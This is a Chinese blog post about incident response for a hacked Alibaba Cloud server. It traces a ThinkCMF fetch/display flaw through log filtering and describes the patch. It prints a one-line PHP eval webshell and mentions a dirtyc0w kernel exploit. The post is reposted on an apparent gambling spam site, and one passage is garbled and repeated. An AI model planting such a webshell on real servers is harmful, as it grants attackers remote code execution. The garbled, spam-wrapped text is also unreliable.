产品展示

Products Classification

阿里云服务器被黑日记---webshell植入原因分析和修复记载

  • 产品时间:2021-05-06 14:21
  • 价       格:

简要描述:早上起来第一件事就是刷今天新馆肺炎的数据,突然手机短信收到提示,说我的网站存在webshell文件,危险品级为紧迫,我意识到的我良久未曾维护的网站被黑客攻破了。马上行动,登录阿里云账号,果不其然,问题已经很严重了,植入了许多webshell,多达16个!现状分析查了一下网站,服务器整个已经袒露了,袒露到什么水平呢?...

详细介绍
本文摘要:早上起来第一件事就是刷今天新馆肺炎的数据,突然手机短信收到提示,说我的网站存在webshell文件,危险品级为紧迫,我意识到的我良久未曾维护的网站被黑客攻破了。马上行动,登录阿里云账号,果不其然,问题已经很严重了,植入了许多webshell,多达16个!现状分析查了一下网站,服务器整个已经袒露了,袒露到什么水平呢?

AG真人国际厅

早上起来第一件事就是刷今天新馆肺炎的数据,突然手机短信收到提示,说我的网站存在webshell文件,危险品级为紧迫,我意识到的我良久未曾维护的网站被黑客攻破了。马上行动,登录阿里云账号,果不其然,问题已经很严重了,植入了许多webshell,多达16个!现状分析查了一下网站,服务器整个已经袒露了,袒露到什么水平呢?很是惨!见下图:这个是在我网站服务器下载下来的,在我的PC测试服务器上复现,基本上任何操作都可以举行,而且可以批量上传和修改webshell,webshell的名称都很隐蔽。另外,另有一个linux内核毛病也被黑客攻陷,见下图:其中,绿色的dirty.c就是针对linux内核毛病的攻击文件,连源代码都传上来了,只需要编译即可,用户和用户组都是www,说明是通过webshell上传过来的。

另外,另有一个search.pl,这个主要是搜索内核毛病版本号的,所以这个黑客,本质上并不是来破坏的我的数据的,而是提示我该打补丁了,顺便看一下search.pl的执行效果。效果显示3.2版本的内核有两个补丁需要打上,也就是dirty.c对应的问题,这都是2013年的的问题了,呵呵。可是听说dirtyc0w(脏牛)问题直到2016年才修复。详细dirtyc0w的故事可以自行搜索,在此不表。

AG真人国际厅

如何解决问题?从上面的现状可以分析出,黑客是先使用网站毛病,植入webshell法式,获取服务器控制权,然后再上传了针对内核毛病的dirtyc0w脏牛的法式。所以解决webshell问题的关键是要找出黑客是如何植入webshell的。关于thinkphp的毛病网上有许多,直接从网上搜索并不能确认黑客的攻击路径,那么改从何入手呢?logs,日志文件,日志文件记载了网站服务器的详细行动,因此从log文件是一个很好的方法。下载log文件,最近有400多M字节,一条一条分析是不大可能的,必须过滤掉无用信息,为此,我用python编写了几行代码,对log数据举行过滤。

对数据分析发现,其实我的网站一直在接受者种种各样的攻击,有许多是不乐成的,好比,返回状态包罗400,403,404等这些都是无效攻击,服务器直接不理。其中有效的必须是包罗index.php的,因此必须把包罗index.php的log保留,在此基础之上,再接纳清除法,把无用的信息去除,最终有用文件巨细缩减为123Kbyte,数据是442行。貌似可以开始了,可是442行数据验证起来也是很贫苦的,继续清除。

从网络查询可以知道,针对thinkcmf的攻击主要是fetch函数和diplay函数的毛病举行的,因此使用该毛病就必须把fetch函数作为payload的一部门,因此不包罗fetch函数的攻击也是无效的,加入一个判断条件:必须包罗fetch字符串。在此运行python过滤器,最终获得5行有效数据。剩下的就简朴了,直接可以手工在测试情况中验证剩下的五条数据。效果是第四条和第五条是正真乐成入侵代码。

该代码可以直接在网站根目录下,生成一个名称为db.php的webshell文件,文件内容为1<?php @eval($_P成一个名称为db.php的webshell文件,文件内容为1<?php @eval($_POST["yu剩下的就简朴了,直接可以手工在测试情况中验证剩下的五条数据。效果是第四条和第五条是正真乐成入侵代码。该代码可以直接在网站根目录下,生成一个名称为db.php的webshell文件,文件内容为1<?php @eval($_P成一个名称为db.php的webshell文件,文件内容为1<?php @eval($_POST["yunfan"]);?>这个文件被植入乐成后,从浏览器会见可以返回1,从而确认db.php文件建立乐成。

AG真人国际厅

接下来就可以通过POST方法来注入其他法式,这种黑客工具就有许多了,比力著名的好比中国菜刀之类的工具等。从紧接下来的log分析就可以看出,黑客的行动可谓迅速,一分钟之内完成了所需要的行动,我的服务器彻底陷落。

下图是log,post行动一分钟之内完成,而且还换了一个ip地址举行post操作至此,整个历程就竣事了,最后给网站打上补丁,将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected。总结毛病总是在使用历程中,不停被发现,因此实时相识所用系统的毛病以及修补方案,实时打补丁才气保证长治久安。另外,一般服务器都有相应的宁静监控。

好比,这次阿里云就实时给我发了许多条信息,因为,这个服务器也不是很重要,没有实时处置惩罚。如果是重要服务器,注意凭据自身情况选用平台提供的宁静工具是很有须要的。

好比,定时备份镜以及宁静软件等。最后,谢谢黑客们的专业精神,仅仅是进入了服务器,没有破坏数据,解决问题的历程中,也让我这样的小白。相识了网络宁静的重要性和宁静知技术。


本文关键词:AG真人国际厅,阿里,云,服务器,被,黑,日记,---webshell,植入

本文来源:AG真人国际厅-www.8373422.com

 


产品咨询

留言框

  • 产品:

  • 留言内容:

  • 您的单位:

  • 您的姓名:

  • 联系电话:

  • 常用邮箱:

  • 详细地址:


推荐产品

Copyright © 2003-2021 www.8373422.com. AG真人国际厅科技 版权所有 备案号:ICP备70439038号-8

在线客服 联系方式 二维码

服务热线

0563-41797209

扫一扫,关注我们